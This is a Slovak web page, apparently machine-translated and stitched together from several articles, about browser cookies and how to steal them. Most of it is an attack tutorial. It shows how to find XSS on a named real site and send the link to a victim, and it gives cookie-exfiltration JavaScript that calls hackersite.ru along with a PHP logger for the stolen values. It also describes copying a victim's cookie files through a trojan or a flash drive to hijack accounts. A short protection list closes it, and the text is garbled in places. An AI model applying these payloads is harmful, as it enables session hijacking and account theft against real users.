Môj priateľ zabudol heslo na jednu stránku. Predtým však pri prihlásení zaškrtol políčko „Zapamätať si ma“. Prehliadač Google Chrome, ktorý mu umožnil prihlásiť sa na stránku pod svojím účtom. Dostal som otázku, či je možné tento magický stav preniesť do iného počítača. Správnejšie by bolo, samozrejme, zmeniť alebo obnoviť heslo, ale známy to nemohol urobiť z dôvodov, ktoré nesúvisia s prípadom.

Ako používať intercepter-ng pre figuríny

Napriek rôznorodosti výberu moderného softvéru je ťažké nájsť programy na hackovanie pre Android lepšie ako intercepter ng. Prvým kritériom v prospech tohto produktu je jeho skutočný výkon. Väčšina navrhovaných snifferov v sieti je len napodobeninou, ktorá neplní deklarované funkcie.

Ďalšími pozitívnymi faktormi sú všestrannosť aplikácie a pokrytie širokého okruhu používateľov.

Počítačová pomoc 939-29-71

Začnime pekne po poriadku. Cookies alebo "cookies" sú veľmi malé textové súbory - záložky s informáciami.

Webový server odošle tieto informácie do prehliadača používateľa. kde sú tieto informácie uložené, kým nebudú potrebné. Nie celkom jasné. Dobre. OK.

Pokúsim sa to ešte zjednodušiť. Pozri. ste sa zaregistrovali na akejkoľvek stránke.

V čase registrácie sa vytvárajú práve tieto „cookies“.

Tu sú.

Cookie Cadger

Program počúva prevádzku v sieti WiFi, zachytáva súbory cookie a replikuje reláciu používateľa vo vašom prehliadači, pričom opakuje požiadavky s jeho prihlasovacími údajmi. Autor Matthew Sullivan predstavil program 30. septembra na hackerskej konferencii Derbycon. Priamo počas prejavu zachytil Matthew Sullivan cez WiFi nezabezpečenú reláciu s Google jedného z účastníkov konferencie.

Ako ukradnúť cookies

Ak na stránke lokality vstúpite do adresný riadok prehliadač Firefox alebo Opera nasledujúci text: javascript:document.write(document.cookie); uvidíte niečo ako: remixAdminsBar=0; remixGroupType=0; remixpass=*************************; remixwall=0; remixInformation=0; remixMembersBar=0; popis remixu=0; remixautobookmark=8; remixemail=********; remixmid=23363; remixchk=5; remixaudios=0; remixlinksBar=1; remixOfficersBar=0; remixPhotosBar=0; remixTopicsBar=0; remixvideos=0; remixRecentNews=0; remixAlbumsBar=0 Pozor! .

Kompletný sprievodca skriptovaním medzi stránkami

XSS je typ zraniteľnosti softvér, natívna pre webové aplikácie, ktorá umožňuje útočníkovi vložiť skript na strane klienta do webových stránok prezeraných inými používateľmi Wikipedia má pre XSS nasledujúcu definíciu: „Skriptovanie medzi stránkami (XSS) je typ softvérovej zraniteľnosti natívne pre webové aplikácie (od prehliadač obchádzania bezpečnostných obmedzení), ktorý umožňuje útočníkovi vložiť skript na strane klienta do webových stránok, ktoré si prezerajú iní používatelia.

Rozdiel medzi súbormi cookie a reláciami

Nie je to tak dávno, čo som napísal článok o tom, ako zaregistrovať a autorizovať používateľov na stránke.

". V tomto článku rozoberiem rozdiel medzi reláciami a súbormi cookie. aby ste urobili svoju konečnú voľbu.

Cookies. Nie, nejde o cookies, ale o vašu bezpečnosť. Takže prejdete na svoju obľúbenú stránku „vkontakte“ (alebo si napríklad pozriete poštu) na počítači niekoho iného, ​​odmietnete možnosť „uložiť heslo“, šťastne si prezriete poštu a odídete. A nemyslite na to, že pod svojím menom teraz môžete ísť sociálna sieť alebo poštou.

Neberiem ani do úvahy situáciu programu, ktorý si pamätá heslo bez toho, aby ste o tom vedeli. Toto už je premyslený hack a zrejme tušíte, že sa niečo také môže stať a na takom počítači nepôjdete na svoju obľúbenú stránku. Ale môžeme hovoriť o jednoduchej ľudskej zvedavosti - boli sme na návšteve u priateľov a potom raz a dostali príležitosť prečítať si vašu poštu. Ste si istý, že takúto príležitosť odmietnu? Nebojíte sa, že sa niečo objaví? V každom prípade nechám otázky morálky bokom a budem hovoriť len o tom, ako sú v počítači uložené informácie, ktoré vám teraz môžu pustiť na nejakú stránku bez toho, aby ste si pýtali heslo.

ako ukradnúť cookies

A názov tejto technológie je cookies.

A tu sa to všetko začalo. Protokol http, na ktorom v skutočnosti prehliadate stránky (vrátane tejto), spočiatku neznamenal možnosť udržiavania spojenia. Zhruba povedané, odošlete požiadavku na stránku, dostanete odpoveď, zobrazí sa na obrazovke a potom si server o vás nič nepamätá. Samozrejme, je to dobré, keď je stránka čisto informačná a nemala by si o vás nič pamätať, ale žijeme vo veku Web 2.0 😉 Prirodzeným vývojom protokolu sú požiadavky POST a GET, keď odošlete nejaké údaje, server môže zapísať ich do databázy údajov, ale to nestačí.

Pozrime sa na veľmi jednoduchý príklad. fórum. Tak ste sa zaregistrovali a na fóre je záznam, že existuje taký a taký používateľ s takým a takým heslom a nejakými ďalšími dodatočnými údajmi. Teraz však prejdete na fórum a prihlásite sa - zadajte svoje heslo. Niekde by mala byť informácia, že ste prihlásený. Na serveri? Samozrejme, že nie! Na server nie je možné uložiť informáciu o tom, že autorizácia bola vykonaná z vášho počítača – nebude vás schopný rozlíšiť od niekoho iného (dokonca ani vaša IP adresa vás jednoznačne neidentifikuje)! Preto informácie o tom, že došlo k autorizácii, musia byť uložené vo vašom počítači. Na to sú cookies, na to boli vytvorené.

Súbor cookie je malý záznam vo vašom počítači, ktorý ukladá informácie o stránke, ktorú ste navštívili. Po autorizácii sa vytvorí podobný záznam, po ktorom už môžete chodiť po fóre a rozpozná vás. To sa však už stane automaticky - vďaka informáciám uloženým v súbore cookie - takže predstieranie, že ste hlavným administrátorom fóra, nebude fungovať bez overenia hesla.

Teraz sa môžeme vrátiť tam, kde tento článok začal. Ak ste sa niekde prihlásili bez uloženia hesla, môže sa stať, že sa na počítači vytvoril záznam, ktorý vám teraz umožňuje neoprávnene zadať tento zdroj pod vaším menom. Takýto záznam sám o sebe bude po chvíli zastaraný, ale môžete ho prinútiť vymazať. Každý prehliadač to robí inak, ukážem vám, ako to urobiť v mojom obľúbenom Google Chrome. Otvorenie možností

Prejdite na kartu „pokročilé“ a nájdite tlačidlo „zobraziť súbory cookie“.

Teraz, samozrejme, môžete vymazať všetky súbory cookie, čo však môže rozrušiť vlastníka počítača. Preto napríklad do horného poľa môžete zadať názov stránky, o ktorú máte záujem

Potom je možné vymazať iba súbory cookie súvisiace s touto stránkou. Môžeš skúsiť ten môj. Navyše, ak sa prihlásite do môjho fóra a potom vymažete súbory cookie, informácie o autorizácii budú zabudnuté. Skús to!

komentáre powered by

1. Čo je XSS
Zraniteľnosť typu XSS umožňuje vloženie ľubovoľného kódu javascript do tela stránky. XSS útok sa líši od ostatných (napr. SQL injection alebo PHP injection) tým, že nepôsobí na serveri, ale na klientovi.

ako ukradnúť cookies

S jeho pomocou nemôžete prezerať databázové tabuľky, nahrávať shell atď. Najbežnejším využitím XSS je kradnutie cookies.
Cookies (Cookies) – malý údaj vytvorený webovým serverom a uložený v počítači používateľa ako súbor. Súbory cookie sa zvyčajne používajú na ukladanie účtov a najčastejšie obsahujú zakódované heslo, prihlasovacie meno a ID relácie. (aj keď nie vždy)
XSS sú dvoch typov, aktívne a pasívne.

Pasívne XSS vyžadovať, aby sa obeť priamo zúčastnila, napríklad nasledovať odkaz obsahujúci kód javascript. Pri používaní tohto typu XSS sa nezaobídete bez SI (Social Engineering)

Aktívne XSS nevyžadujú žiadnu účasť obete, stačí jej prejsť na stránku s XSS. Aktívny XSS môže byť napríklad v príspevkoch na fóre, chatoch, pri pridávaní noviniek atď.

2.Vyhľadajte XSS
V tomto odseku vám poviem, ako nájsť xss

2.1 Pasívne XSS
Ak chcete nájsť pasívny XSS, stačí nahradiť vo vstupnom formulári ak skript fungoval a objavila sa správa „xss“, zraniteľnosť je prítomná, ak skript nefungoval, stále môžete skúsiť ">, toto je pravdepodobne najbežnejšia xss zraniteľnosť. Ak nefungoval ani jeden, ani druhý skript, potom s najväčšou pravdepodobnosťou neexistuje žiadna zraniteľnosť.
Pozrime sa na príklad.
http://miss.rambler.ru/srch/?sort=0& … amp;words=
Vidíte formulár „vyhľadávanie“? vložte tam "> a kliknite na "nájsť"
Vyletelo okno s xss, čo znamená, že xss je prítomné. (Možno v čase, keď čítate tento článok, bude toto xss už opravené)

2.2 Aktívny XSS
Takéto CSS môžu byť napríklad v poliach profilu, pri pridávaní noviniek v názve novinky a v samotných novinkách (menej často), v správach na fórach / chatoch / návštevných knihách so zapnutým html. Všetko je tu jednoduché, do polí zadáme skript z predchádzajúceho pododseku a ak sa správa zobrazí na obrazovke, zraniteľnosť je prítomná.
Zvážte xss v BB tagoch ​​na fórach.
môžete skúsiť hlúpo vložiť kód javascript do značky takto:
javascript:alert('xss')
Niektoré značky majú parametre, napríklad značka má parametre dynsrc a lowsrc, skúsme nahradiť kód takto:
http://www.site.ru/image.jpg dynsrc=javascript:alert('xss')
Ak skript fungoval, xss je

3.Používanie XSS na ukradnutie cookies
Teraz najchutnejšie
Na ukradnutie cookies potrebujeme webový sniffer, môžete si nainštalovať nejaký sniffer na svoj hosting, alebo môžete použiť online sniffer, ktorý je teraz plný.
Aby obeť ukradla cookies prostredníctvom pasívneho XSS, musí nasledovať jedovatý odkaz. Namiesto toho použijeme na ukradnutie cookiesďalší skript:
nahradíme skript v odkaze a necháme obeť, aby ho nasledovala, pozri si denník sniffer a raduj sa.
Pozrime sa na príklad.
Zoberme si ten XSS na rambleri z predchádzajúceho odseku.
Vložiť
">
vo vyhľadávacom formulári kliknite na „nájsť“, pozrite sa do panela s adresou a pozrite si:

http://miss.rambler.ru/srch/?sort=0& … &words =">
Tento odkaz hodíme obeti a užívame si koláčiky.
Keď obeť vidí takýto odkaz, môže niečo tušiť, preto je vhodné kódovať
">
v URL Alebo použite služby ako http://tinyurl.com/
Prejdime k aktívnemu XSS, tu je všetko jednoduché, namiesto alert() vložíme img = new Image(); img.src = "adresa obrázka sniffer"+document.cookie;

Teraz máme cookies. Ale čo s nimi robiť? Je to jednoduché, musia sa nahradiť svojimi vlastnými. AT Prehliadač Opera je tam zabudovaný editor cookies (nástroje-> pokročilé-> správa cookies), existuje plugin pre firefox (nepamätám si názov, použite google)
To je zatiaľ všetko, možno bude článok doplnený

Na otázku Ako získať COOKIES cokies. Potrebujem cookies, ako ich získať, prosím, povedzte mi!!! 1 sada od autora Vlad eeEEeeeeeeeeee najlepšia odpoveď je Čo sú cookies?
Faktom je, že v procese vývoja www-technológií a zavádzania programovacích jazykov na internete sa pred vývojármi programov objavil veľmi vážny problém - ako uložiť výsledky vykonávania algoritmu pre každého konkrétneho používateľa na na dlhú dobu? Samotný protokol HTTP nemá schopnosť zachytávať výsledky softvérových procesov. Používanie relácií tiež nie je riešením problému, pretože ich činnosť je ukončená okamžite po prerušení spojenia so serverom.
Problém bol vyriešený zavedením mechanizmu cookies (to znamená v preklade z angličtiny „cookies“). Súbory cookie majú pozoruhodnú vlastnosť – ukladajú sa na pevný disk používateľa a môžu tam byť uložené takmer neobmedzene.
Vo svojom jadre sú súbory cookie obyčajné textové súbory uložené v špeciálnom adresári používanom prehliadačom (zvyčajne nazývanom dočasné internetové súbory) a môžete ich zobraziť tak, že prejdete do tohto adresára ( rýchly prístup na to pre prehliadač IE sa vykonáva cez položky ponuky Nástroje -> Možnosti internetu -> Dočasné internetové súbory -> Nastavenia -> Zobraziť
Niektoré súbory cookie je možné uložiť len na jednu reláciu, po zatvorení prehliadača sa vymažú. Iné, nastavené na určité časové obdobie, sa zapisujú do súboru. Vo všeobecnosti sa tento súbor nazýva "cookies.txt" (ale môže ich byť niekoľko) a nachádza sa v pracovnom adresári prehliadača nainštalovaného v počítači.
inými slovami
Súbor cookie je malá časť textovej informácie, ktorú server odosiela prehliadaču. Samotné cookies nemôžu robiť nič, ale keď používateľ pristúpi na server (zadá svoju adresu do riadku prehliadača), server môže čítať informácie obsiahnuté v cookies a na základe svojej analýzy vykonať akékoľvek akcie. Napríklad v prípade autorizovaného prístupu k niečomu cez web sa prihlasovacie meno a heslo počas relácie ukladajú do súborov cookie, čo používateľovi umožňuje, aby ich pri vyžiadaní každého dokumentu chráneného heslom znova nezadával.
Ak sa snažíte cez túto tému získať prístup k cudzím zaheslovaným účtom, potom musíte nájsť cestu vzdialene (trójsky kôň) alebo drzým kopírovaním na flash disk, ak máte prístup k počítaču, kde obeť pracuje, skopírujte tento súbor cookie.txt a nahraďte ho vo svojom (rovnakom) prehliadači. Potom prejdete na požadovanú stránku s účtom, ktorý vás zaujíma, a automaticky získate prístup. Majte však na pamäti, že ak obeť na konci práce stlačí výstup z účtu (napríklad z pošty), informácie o relácii sa v súboroch cookie vymažú a nezískate žiadny prístup.
Mozilla Firefox ukladá cookies do používateľského profilu, do súboru C:Documents and SettingsUsernameApplication DataMozillaFirefoxProfiles<имя профиля>cookies.txt
nternet explorer ukladá tieto cookies ako samostatné textové súbory do priečinka C:Documents and SettingsUsernameCookies
Opera ukladá cookies do súboru C:Documents and SettingsUsernameApplication DataOperaOperaprofilecookies4.dat

Cookies - informácie vo forme textového súboru, ktoré webová stránka ukladá do počítača používateľa. Obsahuje autentifikačné údaje (login/heslo, ID, telefónne číslo, adresa poštová schránka), používateľské nastavenia, stav prístupu. Uložené v profile prehliadača.

Cookie hack je krádež (alebo "unesenie") relácie návštevníka na webový zdroj. Tajné informácie sa sprístupnia nielen odosielateľovi a príjemcovi, ale aj tretej strane – osobe, ktorá ich odpočúvala.

Nástroje a techniky na hackovanie súborov cookie

Počítačoví zlodeji, podobne ako ich kolegovia v reálnom živote, okrem zručností, šikovnosti a vedomostí, samozrejme, majú aj vlastné nástroje – akýsi arzenál hlavných kľúčov a sond. Poďme sa zoznámiť s najobľúbenejšími trikmi hackerov, ktoré používajú na vylovenie cookies z obyvateľov internetu.

Snifferi

Špeciálne programy na monitorovanie a analýzu sieťovej prevádzky. Ich názov pochádza z anglického slovesa „sniff“ (sniff), pretože. doslova „vyňuchať“ prenášané pakety medzi uzlami.

Útočníci však používajú sniffer na zachytenie údajov relácie, správ a ďalších dôverné informácie. Objektom ich útokov sú väčšinou nezabezpečené siete, kde sa cookies posielajú v otvorenej HTTP relácii, teda prakticky nie sú šifrované. (Verejná sieť Wi-Fi je najzraniteľnejšia.)

Na vloženie snifferu do internetového kanála medzi hostiteľom používateľa a webovým serverom sa používajú nasledujúce metódy:

  • „počúvanie“ sieťových rozhraní (huby, prepínače);
  • vetvenie a kopírovanie prevádzky;
  • pripojenie k prerušeniu sieťového kanála;
  • analýzu prostredníctvom špeciálnych útokov, ktoré presmerujú prevádzku obetí na sniffer (spoofing MAC, spoofing IP).

Skratka XSS znamená Cross Site Scripting. Používa sa na útoky na webové stránky s cieľom ukradnúť používateľské údaje.

XSS funguje nasledovne:

  • útočník vloží škodlivý kód (špeciálny maskovaný skript) na webovú stránku lokality, fóra alebo do správy (napríklad pri chatovaní na sociálnej sieti);
  • obeť navštívi infikovanú stránku a aktivuje sa nastaviť kód na vašom PC (klikne, nasleduje odkaz atď.);
  • aktivovaný škodlivý kód zase „extrahuje“ dôverné údaje používateľa z prehliadača (najmä súbory cookie) a odošle ich na webový server útočníka.

Aby hackeri „implantovali“ softvérový mechanizmus XSS, používajú najrôznejšie zraniteľnosti webových serverov, online služieb a prehliadačov.

Všetky zraniteľnosti XSS sú rozdelené do dvoch typov:

  • Pasívne. Útok sa získa dotazovaním konkrétneho skriptu webovej stránky. Škodlivý kód možno zadať v rôznych formách na webovej stránke (napríklad do vyhľadávacieho panela na lokalite). Najcitlivejšie na pasívny XSS sú zdroje, ktoré nefiltrujú HTML tagy, keď prídu dáta;
  • Aktívne. Nachádza sa priamo na serveri. A aktivujú sa v prehliadači obete. Aktívne ich využívajú podvodníci v rôznych blogoch, chatoch a spravodajských kanáloch.

Hackeri starostlivo „kamuflujú“ svoje XSS skripty, aby obeť nič netušila. Zmenia príponu súboru, vydajú kód za obrázok, motivujú ich, aby nasledovali odkaz, zaujali zaujímavým obsahom. Výsledkom je, že používateľ PC, ktorý sa nevyrovnal so svojou vlastnou zvedavosťou, vlastnou rukou (kliknutím myši) odošle súbory cookie relácie (s prihlasovacím menom a heslom!) Autorovi skriptu XSS - počítačovému darebákovi.

Spoofing súborov cookie

Všetky cookies sa ukladajú a odosielajú na webový server (z ktorého „prišli“) bez akýchkoľvek zmien – vo svojej pôvodnej podobe – s rovnakými hodnotami, reťazcami a inými údajmi. Zámerná úprava ich parametrov sa nazýva spoofing súborov cookie. Inými slovami, keď je súbor cookie sfalšovaný, útočník si len zbožne želá. Napríklad pri platbe v internetovom obchode sa výška platby v súbore cookie zmení na menšiu stranu – dochádza tak k „úspore“ pri nákupoch.

Ukradnuté súbory cookie relácie na sociálnej sieti z účtu niekoho iného sa „vložia“ do inej relácie a na iný počítač. Vlastník ukradnutých cookies dostane plný prístup na účet obete (korešpondencia, obsah, nastavenia stránky), pokiaľ je na jej stránke.

„Úprava“ cookies sa vykonáva pomocou:

  • funkcie „Spravovať súbory cookie ...“ v prehliadači Opera;
  • doplnky Cookies Manager a Advanced Cookie Manager pre FireFox;
  • nástroje IECookiesView (len pre Internet Explorer);
  • textový editor ako AkelPad, NotePad alebo Windows Poznámkový blok.

Fyzický prístup k údajom

vysoko jednoduchý obvod implementácia pozostáva z niekoľkých krokov. Ale je to účinné iba vtedy, ak je počítač obete s otvorená relácia, napríklad Vkontakte, je ponechaný bez dozoru (a dosť dlho!):

  1. Zadajte do panela s adresou prehliadača funkcia javascript, ktorý zobrazuje všetky uložené súbory cookie.
  2. Po stlačení "ENTER" sa všetky zobrazia na stránke.
  3. Cookies sa skopírujú, uložia do súboru a potom sa prenesú na flash disk.
  4. Na inom počítači sa súbory cookie nahrádzajú v novej relácii.
  5. Otvorí sa prístup k účtu obete.

Hackeri spravidla používajú vyššie uvedené nástroje (+ ďalšie) v kombinácii (keďže úroveň ochrany na mnohých webových zdrojoch je dosť vysoká), ako aj oddelene (keď sú používatelia príliš naivní).

XSS + sniffer

  1. Vytvorí sa XSS skript, ktorý špecifikuje adresu online sniffera (vlastnej produkcie alebo konkrétnej služby).
  2. Škodlivý kód je uložený s príponou .img (formát obrázka).
  3. Potom sa tento súbor nahrá na stránku lokality, do chatu alebo do osobnej správy – kde bude útok vykonaný.
  4. Pozornosť užívateľa púta vytvorená „pasca“ (tu prichádza na rad sociálne inžinierstvo).
  5. Ak „pasca“ funguje, sniffer zachytí súbory cookie z prehliadača obete.
  6. Cracker otvorí protokoly sniffer a vyberie ukradnuté sušienky.
  7. Potom vykoná substitúciu na získanie práv majiteľa účtu pomocou vyššie uvedených nástrojov.

Ochrana cookies pred hackovaním

  1. Použite šifrované pripojenie (pomocou vhodných protokolov a bezpečnostných metód).
  2. Neodpovedajte na pochybné odkazy, obrázky, lákavé ponuky na zoznámenie sa s „novým slobodným softvérom“. Najmä od cudzích ľudí.
  3. Používajte iba dôveryhodné webové zdroje.
  4. Ukončite autorizovanú reláciu stlačením tlačidla „Odhlásiť sa“ (a nielen zatvorením karty!). Najmä ak účet nebol prihlásený pomocou osobný počítač, ale napríklad z PC v internetovej kaviarni.
  5. Nepoužívajte vo svojom prehliadači funkciu „Uložiť heslo“. Uložené registračné údaje občas zvyšujú riziko krádeže. Nebuďte leniví, nenechajte si na začiatku každej relácie pár minút času na zadanie hesla a prihlásenia.
  6. Po surfovaní po webe – návšteve sociálnych sietí, fór, chatov, stránok – odstráňte uložené súbory cookie a vymažte vyrovnávaciu pamäť prehliadača.
  7. Pravidelne aktualizujte prehliadače a antivírusový softvér.
  8. Používajte rozšírenia prehliadača, ktoré chránia pred útokmi XSS (napríklad NoScript pre FF a Google Chrome).
  9. Pravidelne na účtoch.

A hlavne – nestrácajte ostražitosť a pozornosť pri relaxe či práci na internete!

Čo je to cookie?

Existuje mechanizmus, ktorý umožňuje http serveru niektoré ukladať na počítač používateľa textové informácie a potom ju kontaktujte. Táto informácia nazývaný koláčik. V skutočnosti je každý súbor cookie pár: názov parametra a jeho hodnota. Každému cookie je tiež priradená doména, do ktorej patrí. Z bezpečnostných dôvodov má server http vo všetkých prehliadačoch povolený prístup iba k súborom cookie vlastnej domény. Okrem toho môžu mať súbory cookie dátum vypršania platnosti, v takom prípade budú uložené v počítači do tohto dátumu, aj keď budú všetky okná prehliadača zatvorené.


Prečo sú súbory cookie dôležité?

Vo všetkých systémoch s viacerými používateľmi sa na identifikáciu používateľa používajú súbory cookie. Alebo skôr aktuálne spojenie používateľa so službou, relácia používateľa. Ak niekto rozpozná vaše súbory cookie, môže sa prihlásiť vo vašom mene. Pretože v tento moment veľmi málo internetových zdrojov kontroluje zmenu IP adresy počas jednej užívateľskej relácie.


Ako zmeniť alebo zmeniť súbory cookie?

Vývojári prehliadačov neposkytujú vstavané nástroje na úpravu súborov cookie. Ale vystačíte si s obyčajným poznámkovým blokom (notepadom).


Krok 1: vytvorte textový súbor s textom

Windows Editor databázy Registry Verzia 5.00



@="C:\\IE_ext.htm"

Uložíme ho pod názvom IE_ext.reg

Krok 2: Pomocou vytvoreného súboru pridajte zmeny do registra Windows.

Krok 3: vytvorte textový súbor s textom

< script language="javascript">
external.menuArguments.clipboardData.setData("Text" , externe.menuArgumenty.document.cookie);

externé.menuArgumenty.dokument.cookie= "názov testu=hodnota testu; cesta=/; doména=testovacia doména.ru";
alert(externá.menuArgumenty.dokument.cookie);


Uložte ho ako C:\IE_ext.htm

Krok 4: Prejdeme na webovú stránku, ktorá nás zaujíma.

Krok 5: Kliknite pravým tlačidlom myši klikne myšou na voľné miesto stránku a vyberte položku ponuky "Práca so súbormi cookie". Povoliť prístup do schránky. Vaše cookies pre túto stránku budú umiestnené do schránky. Môžete vložiť ich poznámkový blok (poznámkový blok) a uvidíte.


Krok 6: Ak chcete zmeniť niektoré súbory cookie, upravte súbor C:\IE_ext.htm a nahraďte ho testname v mene cookie, testovacia hodnota- o jeho význame, testdomain.ru- na doménu webovej stránky. V prípade potreby pridajte viac takýchto riadkov. Pre pohodlie kontroly som do skriptu pred a po zmene pridal výstup aktuálnych súborov cookie: alert(externá.menuArgumenty.dokument.cookie);

Krok 7: Znova spustite krok 5 a potom obnovte stránku.

Zrátané a podčiarknuté: na tento internetový zdroj prejdeme s aktualizovanými súbormi cookie.

Ako ukradnúť cookies pomocou JavaScriptu?

Ak sa útočníkovi podarilo nájsť príležitosť na spustenie ľubovoľného skriptu JavaScript na počítači obete, prečítajte si ho aktuálne súbory cookie môže veľmi ľahko. Príklad:


varstr=document.cookie;

Bude ich však môcť preniesť na svoju stránku, pretože, ako som už uviedol, skript JavaScript nemôže dodatočné potvrdenie prístup na stránku umiestnenú v inej doméne? Ukázalo sa, že skript JavaScript môže načítať ľubovoľný obrázok umiestnený na ľubovoľnom serveri http. Zároveň do tohto obrázka preneste všetky textové informácie v žiadosti o stiahnutie. Príklad: http://hackersite.ru/xss.jpg?text_info Takže ak spustíte tento kód:

varimg= newImage();

img.src= "http://hackersite.ru/xss.jpg?"+ encodeURI(dokument.cookie);


potom budú cookies v požiadavke na stiahnutie „obrázku“ a „prenechanie“ útočníkovi.

Ako riešiť takéto žiadosti o nahranie „obrázku“?

Útočníkovi stačí nájsť hosting s podpora php a umiestnite kód takto:

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>

Potom sa všetky parametre dopytu tohto skriptu uložia do súboru log.txt. Zostáva iba v predtým popísanom skripte JavaScript nahradiť http://hackersite.ru/xss.jpg na cestu k tomuto php skriptu.


Výsledok

Ukázal som len najjednoduchší spôsob, ako využiť zraniteľnosti XSS. Dokazuje to však, že prítomnosť aspoň jednej takejto zraniteľnosti na internetovej stránke s viacerými používateľmi môže útočníkovi umožniť využívať jej zdroje vo vašom mene.

Opera otvorte hlavnú ponuku, prejdite do časti „Nastavenia“ a vyberte riadok „ Všeobecné nastavenia... ". A môžete len stlačiť horúce klávesy CTRL+ F12. Tým sa otvorí okno nastavení prehliadača, kde na karte „Rozšírené“ musíte kliknúť na sekciu „Cookies“ v ľavom paneli. V ňom musíte kliknúť na tlačidlo „Spravovať súbory cookie“.

AT Mozilla Firefox otvorte v ponuke sekciu „Nástroje“ a vyberte položku „Nastavenia“. V okne nastavení musíte prejsť na kartu „Ochrana osobných údajov“, nájsť tam tlačidlo „Zobraziť súbory cookie ...“ a kliknutím naň prejsť na zoznam súborov cookie uložených prehliadačom. Tu ich možno vyhľadávať a prezerať.

V programe Internet Explorer rozbaľte v ponuke sekciu „Nástroje“ a vyberte „Vlastnosti“. V okne nastavení vlastností prejdite na kartu Všeobecné a kliknite na tlačidlo Možnosti v časti História prehliadania. Týmto spôsobom otvoríte ďalšie okno („Možnosti dočasných súborov“), v ktorom musíte kliknúť na tlačidlo „Zobraziť súbory“.

Kliknite na nadpis „Názov“ v zozname obsahu priečinka dočasných súborov programu Internet Explorer, ktorý sa otvorí – týmto spôsobom môžete zoskupiť všetky súbory cookie do jedného bloku v spoločnej hromade heterogénnych súborov. Tu môžete nájsť požadovaný súbor a otvoriť ho v štandardnom Poznámkovom bloku na prezeranie alebo úpravu.

V prehliadači Google Chrome kliknite na ikonu kľúča v pravom hornom rohu okna a z ponuky vyberte položku Možnosti. Prehliadač otvorí stránku „Nastavenia“ a vy kliknite na odkaz „Rozšírené“ v jeho ľavom paneli a na stránke rozšírených nastavení kliknite na tlačidlo „Nastavenia obsahu“. Ešte nie posledná strana na ceste k súborom cookie uloženým týmto prehliadačom.

Kliknite na tlačidlo „Všetky súbory cookie a údaje stránok“ na ďalšej stránke a konečne budete mať prístup k zoznamu súborov cookie.

Google Chrome poskytuje možnosť vyhľadávať, zobrazovať a odstraňovať súbory cookie.

V prehliadači Safari kliknite na ikonu ozubeného kolieska vpravo horný roh a vyberte riadok "Nastavenia ...". V okne na zmenu nastavení musíte prejsť na kartu „Zabezpečenie“, aby ste tam klikli na tlačidlo „Zobraziť súbory cookie“. Safari poskytuje len funkcie na vyhľadávanie a mazanie cookies, obsah týchto dočasných súborov je tu vidieť len čiastočne.